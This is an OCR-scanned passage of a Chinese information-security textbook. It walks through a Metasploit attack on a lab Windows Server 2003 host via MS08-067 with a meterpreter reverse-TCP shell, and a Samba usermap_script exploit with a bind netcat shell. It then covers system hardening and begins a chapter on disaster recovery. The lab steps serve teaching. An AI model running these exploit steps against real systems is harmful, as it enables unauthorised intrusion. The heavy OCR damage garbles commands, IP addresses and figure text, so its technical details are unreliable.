远程 主机 的 访问 权限 ,最 后 的 维持 访问 就 是 表示 要 守住 攻击 下 的 山头 ,然后 重复 占领 下 一 
Ar MI. 

本 章 的 扫描 中 ,主要 采用 Kali Linux 工具 完成 。Kali 是 一 个 基于 Debian 的 Linux 
发 行 版 ,包含 很 多 安全 和 取证 方面 的 相关 工具 , 预 装 许多 渗透 测试 软件 ,并 且 免 费 , 可 以 
到 官网 下 载 安 装 。 


9.1 Windows 系统 攻击 示例 


Windows 由 于 其 方便 易 用 ,市 场 占 有 率 很 高 ,所 以 针对 Windows 的 攻击 也 是 最 多 
的 。 下 面 以 MS08-067 漏洞 (此 漏洞 暴露 于 2008 年 ,全 称 为 "Windows Server 服务 RPC 
请 求 缓冲 区 溢出 漏洞 ”, 级 别 为 严重”, 广泛 影响 于 Windows 2000/XP/Server 2003/ 
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Vista/Server 2008 的 各 个 版 本 ) 为 例 来 讲解 攻击 过 程 。 如 果 用 户 在 受 影响 的 系统 上 收 到 
特制 的 RPC 请 求 , 则 该 漏洞 可 能 允许 远程 执行 代码 。 在 Microsoft Windows 2000, 
Windows XP 和 Windows Server 2003 系统 上 ,攻击 者 可 能 未 经 身份 验证 即 可 利用 此 漏 
洞 运行 任意 代码 。 

下 面 将 详解 攻击 过 程 ( 此 测试 需要 预先 准备 一 个 带 有 对 应 漏洞 的 目标 靶 机 作为 攻击 
对 象 ) 。 

(1) 打开 kali 系统 ,选择 并 打开 “应 用 程序 ”一 Kali Linux— Top 10 Security Tools © 
metasploit 一 framework, 如 图 9. 1 所 示 。 


应 用 程序 位 置 d] 6 月 8 日 星期 一 06:59 


V, aircraci-ng 


ali Linux > Top 10 Security Tool: 


lli 办 公 ? CA 信息 收集 > burpsuite 
fum ? fa anon s Wnydra 
Her ? b web 程 序 s À john 

E ne ? v^ 密码 攻击 » WN mattego 
Q zn ? xaxd 

@ amua ”人 AAURIRAS > A nmap 

3 mn ? dv Ko wasp-zap 
P META ! Ronan » A sqmap 
e 业余 无 线 电 ， 售 地 向 工程 y UN wireshark 


图 9.1 打开 Kali 系 统 


间 。 该 框架 是 经 典 的 黑客 工具 ,功能 非 
LF 行 攻击 的 强大 软件 。 打 开 后 的 metasploit 


(2) 稍 等 片刻 ,打开 metasploit 需要 点 
强大 ,是 一 个 用 于 开发 漏洞 利用 程序 并 


framework 如 图 9.2 所 示 


BAO DEVU RRG MAT MMH 


Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with 


Metasploit Pro -- n more on http: .co oit 


liary 
ncoders - 
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(3) 可 以 看 出 其 中 1331 多 个 exploits, 为 了 便于 查找 和 提高 查询 速度 ,或 者 保存 运行 
结果 ,metaspoit 可 以 连接 数据 库 ,默认 数据 库 为 postgresql。 在 Kali 系统 中 ,该 数据 库 是 
默认 安装 的 ,但 数据 库 服 务 默 认 是 无 法 启动 的 ,需要 修改 /usr/sbin/update-rc. d 文件 ,把 
其 中 的 Postgresql disabled WH postgresql enabled 的 。 保 存 退 出 后 ,启动 postgresql Hi 
务 才能 成 功 ,如 图 9. 3 所 示 。 


图 9.3 启动 postgresql 服务 


(4) 启动 数据 库 
F psq 


之 后 需要 为 数据 库 设 置 初始 密码 。 第 一 次 需要 以 postgres 用 户 来 打 
然后 进行 密码 的 修改 ,具体 如 图 9. 4 所 示 


tgres=# alter user postgres with password ' 123456 
LE 
tgres-& \quit 


il (9.1.15) 
"help” 来 获取 


s=# alter user 
syntax error at or ne 
alter u 


res=# \quit 


图 9.4 设置 初始 密码 


(5) 现在 就 可 以 在 msf 中 连接 数据 库 了 
在 msf 提示 符 下 执行 db_connect postgres:123456@127. 0. 0. 1/myfirstdb. 
然后 输入 db status 将 会 看 到 : 


Postgresql. connected to postgres 

(6) 现在 数据 库 已 经 连接 ,可 以 来 生成 缓存 提高 查询 速度 了 ,还 是 在 msf 提示 符 下 输 
入 db_rebuild_cache, 然 后 系统 将 会 在 后 台 自 动 生成 缓存 。 

(7) 下 面 可 以 通过 metasploit 来 调用 nmap 扫描 工具 来 对 网 络 进行 扫描 。nmap 是 
个 很 知名 的 扫描 工具 。 为 了 进行 测试 ,我 们 准备 一 台 安 装 了 Windows Server 2003 的 虚 
拟 机 ,IP 地 址 设置 为 172. 18. 33. 143, 然 后 直接 对 此 机 器 进行 扫描 。 具 体 的 扫描 的 命令 
如 下 。 


Nep - sT -A - v - script= sb- check- vulns -script-args-unsafe-1 -F0172.18.33.143 


执行 效果 如 图 9. 5 所 示 
(8) 在 图 9.5 中 ,可 以 看 到 MS08-067:VULNERABLE, 表 示 有 个 ms08-067 的 漏洞 
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k- vulns: 
VULNERABLE 
Likely CLEAN 
DoS (CVE- 200 103): NOT VULNERABLE 
025: NO SERVICE (the Ras RPC service is inactive) 
NO SERVICE (the Dns Server RPC service is inactive) 


ADDRESS 
17.75 ms bogon (172. 18. 33. 143) 


ript Post- scanning 
Read data files from: /usr/bin/../share/nmap 
and Service detection performed. Please any incorr results at http: 
nmap. org/ submit, 
Nmap done: 1 IP address (1 host ul sca in 71 seconds 
Raw packets sent 7 E ) E 17 (1. 222KB) 
msf > | 


图 9.5 调用 nmap 对 网 络 扫描 


是 可 以 利用 的 ,下 面 进行 实际 的 攻击 过 程 , 首 先 输入 命令 : search ms08_067 ,查看 系统 中 
是 否 有 溢出 的 工具 果 如 图 9.6 所 示 


Matching Modules 
Name Disclosu scription 
exploit/windows/smb/ms08 067 netapi 2008 067 Microso| 


ft Server Service Relative Path Stack Corruption 


msf 


图 9.6 查看 系统 中 是 否 有 溢出 的 工具 


(9) 可 以 看 出 ,系统 有 针对 该 漏洞 进 和 的 代码 。 下 面 通过 命令 :; use windows/ 
smb/ms08_067_netapi 来 决定 使 用 该 脚本 ,可 以 发 现 命令 提示 符 已 经 改变 ,如 图 9. 7 
所 示 。 


图 9.7 命令 提示 符 改变 


(10) 下 面 通过 命令 : set PAYLOAD windows/meterpreter/reverse tcp 设置 系统 的 
连接 功能 。 效 果 如 图 9. 8 所 示 


图 9.8 系统 连接 设置 
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QD 下 面 通过 命令 : show targets 来 查看 该 漏洞 对 哪些 目标 系统 是 有 效 的 。 结 果 如 
图 9.9 所 示 。 


Automatic Targeting 
00 Universal 
0/SP1 Univer 
SP2 English (AlwaysOn NX) 
SP2 English 
SP3 English (AlwaysOn NX) 


Windows 
Windoi 

Windoi 3 SP1 English (NX) 
Windows SP1 Japanese ( 


O NX) 
Windows 3 5 German (NX) 
Windo X Arabic (NX) 
Windows 
Wini 
Windows 
Winc 
Windows 
Windows XP S German (NX) 
Windo SP2 Greek (NX) 


图 9.9 查看 目标 对 哪些 系统 有 效 


(12) 一 共有 67 个 目标 系统 有 该 漏洞 ,我 们 扫描 的 系统 是 Windows Server 2003 中 文 
版 ,这 里 只 有 7 符合 ,所 以 通过 命令 set TARGET 7 来 设置 目标 ,如 图 9. 10 所 示 。 


图 9.10 set TARGET7 


(13) 然后 设置 目标 IP, 即 我 们 攻击 的 目标 ,命令 为 : set RHOST 172. 18 
(14) 设置 本 地 IP, 可 以 让 目标 主动 连接 上 来 ,命令 为 : set LHOST 172.1 
(15) 设置 本 地 端口 ,命令 为 : set LPORT 8 
(16) 通过 命令 show options 查看 设置 结果 。 效 果 如 图 9. 11 所 示 
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tting Required ription 


target address 
t the SMB service port 
(BROWSER, SRVS' 


/ reverse tcp): 
ired Description 


seh, thread, p 
none) 

LHOST 172 3.41 yes The listen address 

LPORT 8 yes The listen port 


xploit target 


DEL 


Windows 2003 SPO Universal 


sf exploit( 


图 9.11 命令 show options 查看 设置 结果 
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(17) 现在 可 以 执行 命令 : exploit。 效 果 如 图 9. 12 所 示 。 


f exploit( 


Started 
Attempting to 


129) at 201 


图 9. 12 执行 命令 exploit 


(18) 可 以 看 出 , 系 乡 4 成功, 反 向 连接 也 成 功 了 ,命令 提示 符 变 成 了 meterpreter。 
最 后 我 们 通过 命令 shell 来 登录 到 对 象 机 器 的 shell 上 ,至 此 ,你 已 经 具有 对 对 方 机 器 操作 
的 完整 权限 ,如 图 9. 13 Bros 。 


^ shell 
created 
2. 3790) 
[1 2777 1 Microsoft Corp. 


C: WINDOWS system325ll 


图 9.13 系统 反 向 连接 成 功 


9.2 Linux 系统 攻击 示例 
在 本 例 中 ,我 们 简单 示例 来 攻击 一 台 Ubuntu 的 主机 ,所 用 工具 同上 ,具体 过 程 也 是 
差不多 的 。 所 以 有 些 步骤 在 本 实例 中 就 省 略 。 下 面 简要 展示 基本 过 程 。 
(1) 打开 metasploit 
(2) 出 现 msf 提示 符 时 ,假设 我 们 已 经 知道 了 漏洞 名 称 ,可 以 直接 输入 : Use multi/ 
samba/usermap_script, 如 图 9. 14 所 示 。 


G) 检索 可 用 攻击 脚本 ,输入 命令 show payloads, 结 果 如 图 9. 15 所 示 。 


图 9.14 输入 漏洞 名 称 图 9.15 检索 可 用 攻击 脚本 


(4) 设置 攻击 脚本 。 输 入 命令 如 下 : set payload cmd/unix/bind netcat. 

效果 如 图 9. 16 所 示 

(5) 设置 RHOST。 输 入 命令 如 下 : set RHOST 192. 168. 2. 18, 

(6) 执行 exploit 进行 溢出 ,效果 如 图 9.17 所 示 。 

(7) 执行 命令 ,溢出 成 功 后 ,就 可 以 远程 执行 命令 了 ,至 此 ,针对 Linux 系统 的 攻击 完 
成 。 例 如 whoami, 结 果 如 图 9. 18 所 示 。 
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图 9.17 进行 溢出 


图 9.18 溢出 成 功 


9.3 系统 防范 策略 


从 前 面 示例 可 以 看 出 ,系统 的 致命 漏洞 引起 的 攻击 风险 是 很 高 的 。 对 付 这 些 问题 , 管 
理 员 一 定 要 养 成 经 常 升级 系统 的 习惯 。 当 系统 打上 最 新 的 补丁 的 时 候 , 很 多 的 漏洞 问题 
就 被 修复 。 如 果 补 丁 还 没有 出 来 , 则 停 掉 服务 。 如 果 服 务 一 定 不 能 停 , 那 就 只 有 修改 这 个 
服务 ,这 个 对 技术 的 要 求 就 很 高 。 


Windows 和 Linux 操作 系统 的 


- 般 加 固 策略 及 技术 在 第 4 章 已 经 专门 进行 过 介绍 ， 
在 此 ,我 们 针对 常规 系统 防范 ,再 具体 概述 如 下 。 


9.3.1 Windows 系统 常规 防范 策略 


Windows 系统 常规 防范 策略 的 主要 方法 有 : 

(1) 使 用 Windows update 安装 最 新 补丁 ; 

(2) 更 改 密码 长 度 最 小 值 密码 最 长 存留 期 \ 密 码 最 短 存留 期 \ 账 号 锁定 计数 器 、 账 户 
锁定 时 间 、 账 户 锁定 阀 值 ,保障 账号 以 及 口令 的 安全 ; 

(3) 将 默认 Administrator 用 户 和 组 改名 ,禁用 Guests 并 将 Guest 改名 ; 

(4) 开启 安全 审核 策略 ; 

O AH s SE LAS s 

C6) 将 暂时 不 需要 开放 的 服务 停止 ; 

(7) 限制 特定 执行 文件 的 权限 ; 

(8) 调整 事件 日 志 的 大 小 、 覆 盖 策 略 ; 
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(9) 禁止 匿名 用 户 连接 ; 
(10) 删除 主机 管理 共享 。 


9.3.2 Linux 系统 常规 防范 策略 


Linux 系统 一 般 会 通过 对 应 的 操作 命令 来 完成 常规 的 系统 加 固 , 管 理 员 可 以 参考 
: 安全 加 固 配置 手册 ;一 类 的 工具 来 完成 相应 的 工作 。 iix f .此 特殊 的 
漏洞 或 突 发 的 安全 性 问题 ,还 是 需要 管理 员 本 身 有 比较 高 的 系统 管理 水 平 。 

举例 来 说 ,2009 年 8 月 ,国外 黑客 公开 一 个 几乎 可 以 攻击 当时 所 有 新 旧 Linux 系统 
的 一 个 漏洞 ,包括 但 不 限于 RedHat, CentOS, SUSE, Debian, Ubuntu, Slackware, 
e 至 只 需要 执行 一 个 命令 ,就 可 以 通过 此 漏洞 
获得 root 权限 (当然 还 是 要 满足 - 些 特定 "m 的 ), 如 图 9. 19 BEAR 。 


5 82:1 
11:32 
13 18:46 
B3:1 


2.4.20-8bigmem #1 SMP Thu Mar 13 17:32:29 EST 2983 i686 i686 i386 


图 9.19 Linux 系统 漏洞 


在 当时 解决 此 漏洞 的 临时 方案 如 下 

(1) 使 用 Grsecurity 或 者 Pax 内 核 安 全 补丁 ,并 开启 KERNEXEC 防护 功能 。 

(2) 升级 到 2. 6. 31-rc6 或 2. 4. 37. 5 以 上 的 内 核 版 本 。 

(3) 如 果 使 用 的 是 RedHatEnterprise Linux 4/5 的 系统 或 Centos4/5 的 系统 ,可 以 通 
过 下 面 的 操作 防止 被 攻击 。 

在 /etc/nf 文件 中 加 入 下 列 内 容 : 

install pppox /bin/true 

install bluetooth /bin/true 

install appletalk /bin/true 

install ipx /bin/true 

install sctp /bin/true, 

执行 /sbin/lsmod | grep -e ppp -e blue -e app -e ipx -e sct, 如 果 没 有 输出 ,不 需要 重 
启 系统 ,如 果 有 输出 , 则 需要 重启 系统 . 才 可 以 对 此 攻击 免疫 。 
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(4) 如 果 使 用 的 是 Debian 或 Ubuntu 系统 ,可 以 通过 下 面 的 操作 防止 被 攻击 。 


cat > /etc/mpdprobnf << EM 
install pp generic /bin/træ 
install pppoe /bin/true 
install pppox /bin/true 
install slhc /bin/true 
install bluetooth /bin/true 
install ax25 /bin/true 
install x25 /bin/true 
install appletalk /bin/true 
EOM 
/etc/init.d/bluez- utils stop 


上 述 这 些 方法 和 策略 ,需要 管理 员 有 比较 丰富 的 经 验 和 雄厚 的 技术 实力 作为 保障 。 
作为 系统 安全 管理 人 员 ,实际 上 我 们 是 永远 无 法 预知 漏洞 何 时 会 爆发 的 ,平时 要 做 好 安全 
设置 才 是 根本 防范 之 道 。 


9.4 课 后 体会 与 练习 


l. 系统 渗透 攻击 主要 遵循 哪些 步 又? 
2. Nmap 主要 用 于 渗透 攻击 的 哪个 阶段 ? 
3. 简 述 在 Metasploit 中 设置 PLAYLOAD 的 作用 。 
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10.1 容 灾 技术 概述 


忽视 数据 备份 ,没有 容 灾 能 力 将 会 给 企业 或 组 织带 来 巨大 的 损失 , 据 统计 资料 显示 ， 
当 受 到 数据 灾难 袭击 的 时 候 ,30% 受 影响 的 公司 被 迫 立即 退出 市 场 ,另外 有 29% 受 影响 
的 公司 会 在 两 年 内 倒闭 。 所 以 当 各 种 无 法 预知 的 事故 或 灾难 导致 重要 的 数据 丢失 时 ,能 
够 及 时 采取 灾难 恢复 措施 ,可 以 将 企业 或 组 织 的 损失 降低 到 最 低 。 

据 统计 资料 显示 ,2000 年 以 前 的 10 年 间 发 生 过 灾难 的 公司 中 ,有 55% 当 时 倒闭 , 剩 
下 的 45% 中 ,因为 数据 丢失 ,有 29% 也 在 两 年 之 内 倒闭 ,生存 下 来 的 仅 占 1626. dE 
1993 年 发 生 的 美国 世贸 中 心 大 楼 爆炸 事件 ,爆炸 前 , 约 有 350 家 企业 在 该 楼 中 工作 ,一 年 
后 ,再 回 到 世贸 大 楼 的 公司 变 成 150 家 ,有 200 家 企业 由 于 无 法 存 取 原 有 重要 的 信息 而 倒 
闭 。2003 年 ,国内 某 电 信和 运营 商 的 计 费 存储 系统 发 生 两 个 小 时 的 故障 ,造成 400 多 万 元 
的 损失 ,这些 还 不 包括 导致 的 无 形 资产 损失 。 另 外 ,大 家 熟悉 的 “9. 11" 事 件 带 来 的 损失 更 
是 巨大 ,还 有 许多 举 不 胜 举 且 触 目 惊 心 的 例子 ,每 一 次 都 是 惨痛 的 教训 。 由 此 可 见 ,尽管 
小 心 谨慎 ,还 是 不 可 避免 地 会 发 生 各 种 各 样 的 灾难 。 


10.1.1. 容 灾 的 定义 


容 灾 是 一 个 范畴 很 广泛 的 概念 ,是 一 个 系统 工程 ,包括 支持 用 户 业 务 的 方方面面 ,可 
以 将 所 有 与 业务 连续 性 相关 的 内 容 都 纳入 到 容 灾 中 。 对 于 IT 而 言 , 容 灾 提 供 一 个 能 防 
止 用 户 业 务 系统 遭受 各 种 灾难 破坏 的 计算 机 系统 。 容 灾 主 要 表现 为 一 种 未 雨 绸 缪 的 主动 
性 ,而 不 是 在 灾难 发 生 后 的 亡羊补牢 。 

容 灾 是 指 在 发 生 灾 难 性 事故 时 .能够 利用 已 备份 的 数据 或 其 他 手段 ,及 时 对 原 系统 进 
行 恢复 ,以 保证 数据 的 安全 性 以 及 业务 的 连续 性 。 

从 技术 上 看 ,衡量 容 灾 系统 有 两 个 主要 指标 : RPO 和 RTO, 

RPO( Recovery Point Object): 即 数据 恢复 点 目标 ,主要 是 指 当 灾 难 发 生 时 业务 系统 
所 能 容忍 的 数据 丢失 量 。 

RTO( Recovery Time Object): 即 数据 恢复 时 间 目 标 , 主 要 是 指 所 能 容忍 的 业务 停止 
服务 的 最 长 时 间 , 即 从 灾难 发 生 到 业务 系统 恢复 服务 功能 所 需要 的 最 短 时 间 周 期 。 

RPO 针对 的 是 数据 丢失 ,而 RTO 针对 的 是 服务 丢失 ,二 者 没有 必然 的 关联 性 。RPO 
和 RTO 的 确定 必须 在 进行 风险 分 析 和 业务 影响 分 析 后 ,根据 不 同 的 业务 需求 确定 。 对 
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于 不 同 企业 的 同一 种 业务 ,RPO 和 RTO 的 需求 也 会 有 所 不 同 。RPO RTO 越 小 ,系统 
的 可 用 性 就 越 高 ,当然 需要 的 投资 也 越 大 。 


10.1.2 导致 系统 灾难 原因 


从 广义 上 讲 , 对 于 一 个 计算 机 系统 而 言 , 一 切 引起 系统 非 正常 停机 的 事件 都 称 之 为 灾 
难 。 威 胁 数 据 的 安全 ,造成 系统 失效 的 主要 原因 有 以 下 几 个 方面 。 

CD 硬件 故障 。 主 要 的 硬件 故障 包括 L/O 和 硬盘 损坏 .电源 (包括 电缆 插座) 以 及 网 
络 故障 等 ,如 果 是 安装 系统 的 磁盘 故障 , 则 还 必须 重建 系统 。 

(2) 人 为 错误 。 最 容易 忽略 的 故障 原因 ,包括 误 操作 .人 为 蓄意 破坏 ,如 对 一 些 关键 
系统 配置 文件 的 不 当 操作 ,或 者 人 为 删除 一 个 文件 或 格式 化 一 个 磁盘 ,会 导致 系统 不 能 正 
常 启 动 。 另 外 还 有 黑客 的 攻击 ,黑客 侵入 计算 机 系统 ,并 且 破 坏 计 算 机 系统 。 

G) 软件 故障 。 最 为 复杂 和 多 样 化 的 故障 原因 ,如 系统 参数 设置 不 当 或 者 由 于 应 用 
程序 没有 优化 ,造成 运行 时 系统 资源 分 配 不 合理 或 数据 库 参 数 设置 不 当 等 ,都 有 可 能 导致 
系统 性 能 下 降 ,甚至 停机 。 

CD 病毒 影响 。 病 毒 使 计算 机 系统 感染 ,损坏 计算 机 数据 ,需要 及 早 预 防 病毒 的 
攻击 。 

(5) 自然 灾难 。 包 括 地 震 、 台 风 \ 水 灾 、 雷 电 和 火灾 等 会 无 情 地 毁灭 计算 机 系统 ,这 种 
灾难 破坏 性 很 大 ,影响 面 比 较 广 。 

灾难 发 生 后 ,恢复 的 一 般 步 又 如 下 。 

第 一 步 : 恢复 硬件 。 

第 二 步 : 重新 装 人 操作 系统 。 

第 三 步 : 设置 操作 系统 (驱动 程序 设置 .系统 和 用 户 设置 ) 。 

第 四 步 : 重新 装 入 应 用 程序 ,进行 系统 设置 。 

第 五 步 : 用 最 新 的 备份 恢复 系统 数据 。 


10.1.3 容 灾 的 级 别 


容 灾 可 以 分 为 三 个 级 别 : 数据 级 别 、 应 用 级 别 和 业务 级 别 。 

1. 数据 级 容 灾 

数据 级 容 灾 关注 点 在 于 数据 ,需要 确保 用 户 数据 的 完整 性 、 可 靠 性 、 安 全 性 和 一 致 性 ， 
即 灾难 发 生 后 可 以 确保 用 户 原 有 的 数据 不 会 丢失 或 者 遭 到 破坏 。 数 据 级 容 灾 较 为 基础 ， 
其 中 , 较 低级 别 的 数据 容 灾 方 案 仅 需 利用 磁带 库 和 管理 软件 就 能 实现 数据 异地 备份 ,达到 
容 灾 的 功效 ;而 较 高 级 的 数据 容 灾 方 案 则 是 依靠 数据 复制 工具 ,例如 卷 复制 软件 ,或 者 存 
储 系统 的 硬件 控制 器 ,实现 数据 的 远程 复制 。 

数据 级 容 灾 是 保障 数据 可 用 的 最 后 底线 , 当 数 据 丢 失 时 能 够 保证 应 用 系统 可 以 重新 
得 到 所 有 数据 。 从 这 种 意义 上 讲 .数据 备份 属于 该 级 别 容 灾 , 用 户 把 重要 的 数据 存放 在 磁 
带 上 ,如 果 考 虑 到 高 级 别 的 安全 性 还 可 以 把 磁带 运送 到 远 距 离 的 地 方 保存 , 当 灾 难 发 生 
后 ,从 磁带 中 获取 数据 。 该 级 别 灾难 恢复 时 间 较 长 ,用 户 原 有 数据 没有 丢失 ,但 是 对 于 提 
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供 实时 服务 的 信息 系统 ,应 用 会 被 中 断 , 用 户 业 务 也 被 迫 停止 。 

2. 应 用 级 容 灾 

应 用 级 容 灾 在 数据 级 容 灾 的 基础 上 ,把 执行 应 用 处 理 能 力 复制 一 份 , 即 在 备份 站 点 同 
样 构建 一 套 应 用 系统 ,在 保证 用 户 数据 的 完整 性 .可 靠 性 、 安 全 性 和 一 致 性 的 前 提 下 ,提供 
不 间断 的 应 用 服务 ,让 客户 的 应 用 服务 请 求 能 够 透明 地 继续 运行 ,而 感受 不 到 灾难 的 发 
生 , 保 证 整个 信息 系统 提供 的 服务 完整 .可 靠 、 安 全 和 一 致 。 一 般 来 说 ,应 用 级 容 灾 系统 需 
要 通过 更 多 软件 来 实现 , 它 可 以 使 企业 的 多 种 应 用 在 灾难 发 生 时 进行 快速 切换 ,确保 业务 
的 连续 性 。 应 用 级 容 灾 比 数据 级 容 灾 要 求 更 高 。 

3. 业务 级 别 

数据 级 容 灾 和 应 用 级 容 灾 都 是 在 IT 范畴 之 内 ,然而 对 于 正常 业务 而 言 , 仅 IT 系统 
的 保障 还 是 不 够 的 。 有 些 用 户 需 要 构建 最 高 级 别 的 业务 级 别 容 灾 。 

业务 级 容 灾 的 大 部 分 内 容 是 非 YT 系统 ,比如 电话 、 办 公 地 点 等 。 当 一 场 大 的 灾难 发 
生 时 ,用 户 原 有 的 办 公 场 所 都 会 受到 破坏 ,用 户 除 了 需要 原 有 的 数据 、 原 有 的 应 用 系统 ,更 
需要 工作 人 员 在 一 个 备份 的 工作 场所 能 够 正常 地 开展 业务 。 


10.1.4. KAHE 


由 于 容 灾 所 承担 的 是 用 户 最 关键 的 核心 业务 ,其 发 挥 的 作用 异常 重要 , 容 灾 本 身 的 复 
杂 性 也 是 十 分 明显 ,这些 决 定 了 容 灾 是 一 项 系统 工程 。 

容 灾 首先 涉及 众多 技术 及 众多 厂商 的 各 类 解决 方案 。 性 能 、 灵 活性 及 价格 都 是 必须 
考虑 的 因素 ,更 重要 的 是 ,用 户 需要 根据 自己 的 实际 需求 量 身 打造 。 许 多 用 户 的 生产 站 点 
都 是 经 过 长 期 积累 、 多 次 改造 后 形成 的 ,对 于 特殊 的 应 用 还 采用 特定 的 设备 。 那 么 当 用 户 
考虑 构建 容 灾 站 点 时 就 必须 把 所 有 的 情况 都 考虑 进来 ,构建 容 灾 方 案 的 一 条 基本 准则 是 
“选择 适合 自己 的 ”。 与 此 同时 用 户 还 要 考虑 长 远 一 些 , 尽 量 采 用 先进 而 不 是 将 要 淘汰 的 
技术 ,毕竟 完 余 站 点 与 生产 站 点 一 样 会 长 期 使 用 。 

一 个 完整 的 容 灾 系统 应 该 包含 三 个 部 分 : 本 地 容 灾 、 异 地 容 灾 和 有 效 的 管理 机 制 。 

1. 本 地 容 灾 

本 地 容 灾 主 要 手段 是 容错 ,容错 的 基本 思想 是 在 系统 体系 结构 上 精心 设计 ,利用 外 加 
资源 的 元 余 技术 来 达到 屏蔽 故障 ,自动 恢复 系统 或 安全 停机 的 目的 。 

2. 异地 容 灾 

当 遇 到 自然 灾害 (火山 、 地 震 ) 或 者 战争 等 意外 事件 时 , 仅 采用 本 地 容 灾 并 不 能 满足 要 
求 ,这 就 应 该 考虑 采用 异地 容 灾 的 保护 措施 。 异 地 容 灾 是 指 在 相隔 较 远 的 异地 ,建立 两 套 
或 多 套 功 能 相同 的 IT 系统 ,当主 系统 因 意外 停止 工作 时 ,备用 系统 可 以 接 蔡 工作 ,保证 
系统 的 不 间断 运行 。 异 地 容 灾 系统 采用 的 主要 方法 是 数据 复制 ,目的 是 在 本 地 与 异地 之 
间 确 保 各 系统 关键 数据 和 状态 参数 的 一 致 

3. 有 效 的 管理 机 制 

容 灾 备份 是 通过 特定 的 容 灾 机 制 实现 的 。 需 从 容 灾 的 概念 必要 性 、 预 先 考虑 的 因素 、 
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容 灾 备份 等 级 / 容 灾 方案 的 选择 等 几 个 方面 考虑 如 何 建立 容 灾 机 制 。 

对 于 容 灾 系统 来 说 ,所 包含 的 关键 技术 有 数据 存储 管理 .数据 复制 灾难 检测 、 系 统 迁 
移 和 灾难 恢复 五 个 方面 。 

COD 数据 存储 管理 是 指 对 与 计算 机 系统 数据 存储 相关 的 一 系列 操作 (如 备份 .归档 和 
恢复 等 ) 进 行 的 统一 管理 ,是 计算 机 系统 管理 的 一 个 重要 组 成 部 分 ,也 是 建立 一 个 容 灾 系 
统 的 重要 组 成 部 分 。 

数据 备份 是 指 为 防止 系统 出 现 操作 失误 或 系统 故障 导致 数据 丢失 ,而 将 全 系统 或 部 
分 数据 集合 从 应 用 主机 的 硬盘 或 阵列 复制 到 其 他 的 存储 介质 的 过 程 ,数据 备份 是 容 灾 的 
基石 。 

数据 归档 是 将 硬盘 数据 复制 到 可 移动 媒体 上 。 与 数据 备份 不 同 的 是 ,数据 归档 在 完 
成 复制 工作 后 将 原始 数据 从 硬盘 上 删除 ,释放 硬盘 空间 。 

数据 备份 是 数据 存储 管理 中 的 一 个 重要 部 分 。 数 据 备份 的 评价 标准 包括 备份 速度 、 
恢复 速度 以 及 数据 恢复 点 。 

为 了 提高 备份 的 效率 ,出 现 了 很 多 新 的 备份 技术 ,在 很 大 程度 上 提高 了 备份 速度 , 主 
要 的 备份 技术 在 后 面 介绍 。 

(2) 容 灾 系统 的 核心 技术 是 数据 复制 。 顾 名 思 义 ,数据 复制 就 是 将 一 个 地 点 的 数据 
复制 到 另外 一 个 不 同 的 物理 点 上 的 过 程 。 

数据 复制 一 般 分 为 同步 数据 复制 和 异步 数据 复制 。 

根据 复制 数据 的 层次 进行 细 化 ,可 以 分 为 以 下 四 种 类 型 。 

CD 硬件 级 的 数据 复制 : 主要 是 在 磁盘 级 别 对 数据 进行 复制 ,包括 磁盘 镜像 和 卷 复 制 
等 ,这 种 类 型 的 复制 方法 可 以 独立 于 应 用 ,并 且 复 制 速度 也 较 快 ,对 生产 系统 的 性 能 影响 
也 较 小 ,但 是 开销 比较 大 。 

@ 操作 系统 级 的 复制 : 主要 是 在 操作 系统 层次 ,对 各 种 文件 的 复制 ,这 种 类 型 的 复 
制 受到 具体 操作 系统 的 限制 。 

@ 数据 库 级 的 复制 : 是 在 数据 库 级 别 将 对 数据 库 的 更 新 操作 以 及 其 他 事务 操作 以 
消息 的 形式 复制 到 异地 数据 库 , 这 种 复制 方式 的 系统 开销 也 很 大 ,并 且 与 具体 数据 库 
相关 。 

D 业务 数据 流 级 复制 : 就 是 业务 数据 流 的 复制 ,就 是 将 业务 数据 流 复制 到 异地 备用 
系统 ,经 过 系统 处 理 后 ,产生 对 异地 系统 的 更 新 操作 ,从 而 达到 同步 。 这 种 方式 ,也 可 以 独 
立 于 具体 应 用 ,但 是 可 控 性 较 差 。 现 在 利用 这 种 方式 来 实现 容 灾 系统 的 例子 还 很 少 。 

(3) 灾难 检测 。 现 在 对 灾难 的 发 现 方法 一 般 是 通过 心跳 技术 和 检查 点 技术 ,这 种 技 
术 在 高 可 靠 性 集群 中 应 用 很 广泛 。 

心跳 技术 又 称 为 拉 技 术 ,就 是 每 隔 一 段 时 间 都 要 向 外 广播 自身 的 状态 (通常 为 “存活 ” 
状态 ) ,在 进行 心跳 检测 时 ,心跳 检测 的 时 间 和 时 间 间 隔 是 关键 问题 ,如 果 心 跳 检测 的 太 频 
繁 ,将 会 影响 系统 的 正常 运行 ,占用 系统 资源 ;如 果 间 隔 时间 太 长 , 则 检测 就 比较 迟钝 , 影 
响 检 测 的 及 时 性。 

检查 点 技术 又 称 为 主动 检测 ,就 是 每 隔 一 段 时 间 ,就 会 对 被 检测 对 象 进行 一 次 检测 ， 
如 果 在 给 定 的 时 间 内 ,被 检测 对 象 没有 相应 . 则 认为 检测 对 象 失效 。 与 心跳 技术 相同 , 检 
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测 点 技术 也 受到 检测 周期 的 影响 ,如 果 检 测 周期 太 短 ,虽然 能 够 及 时 发 现 故 障 , 但 是 给 系 
统 造成 很 大 的 开销 ;如 果 检 测 周期 太 长 , 则 无 法 及 时 发 现 故 障 。 

对 于 异地 容 灾 ,备份 生产 中 心 和 主 生产 中 心 可 能 相隔 千里 ,这 时 候 因 为 网 络 延 迟 较 大 
或 者 其 他 原因 ,可 能 会 影响 心跳 检测 的 效果 ,因此 如 何 对 现 有 的 检测 技术 进行 改进 ,以 适 
应 广域网 的 要 求 , 将 是 实现 高 效 的 远程 容 灾 系 统 的 基础 。 

(4) 系统 迁移 。 在 发 生 灾 难 时 ,为 了 能 够 保证 业务 的 连续 性 ,必须 实现 能 够 实现 系统 
透明 的 迁移 ,也 就 是 能 够 利用 备用 系统 透明 地 代替 生产 系统 ,一 般 是 通过 DNS 或 者 IP 地 
址 的 改变 来 实现 系统 迁移 的 。 

(5) 灾难 恢复 。 灾 难 恢 复 是 为 恢复 计算 机 系统 提供 保证 的 。 业 界 广 泛 的 经 验 和 教训 
说 明 , 灾 难 恢复 的 成 功 在 于 企业 中 经 过 良好 训练 和 预演 的 人 在 自己 的 角色 上 实施 预先 计 
划 的 策略 , 即 灾难 恢复 计划 。 在 系统 备份 与 灾难 恢复 计划 建立 以 后 ,还 必须 在 事前 反复 测 
